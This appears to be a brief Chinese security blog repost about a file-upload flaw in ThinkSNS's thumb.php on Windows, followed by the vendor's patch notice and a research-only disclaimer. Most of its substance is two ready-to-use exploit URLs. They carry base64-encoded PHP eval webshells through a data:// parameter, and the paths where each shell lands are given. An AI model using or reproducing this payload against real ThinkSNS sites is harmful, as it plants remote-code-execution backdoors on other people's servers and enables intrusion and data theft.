exp:xxx.xxxx/thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW2NdKXtldmFsKCRfUE9TVFtjXSk7fWVsc2V7cGhwaW5mbygpO30/Pg==&w=&t=.php&r=1
shell:xxx.xxxx/data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php
测试。。
摘自:https://t00ls.net/thread-20463-1-1.html
thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW3NiXSl7ZXZhbCgkX1BPU1Rbc2JdKTt9ZWxzZXtwaHBpbmZvKCk7fT8+&w=&t=.php&r=1
data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php
#ThinkSNS官方补丁#
ThinkSNS在windows上部署存在安全漏洞,缩略图程序thumb.php可以上传php文件,请各位用户尽快修复,请在社区下载补丁,解压覆盖根目录下同名文件即可。
补丁地址(任选一个):
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论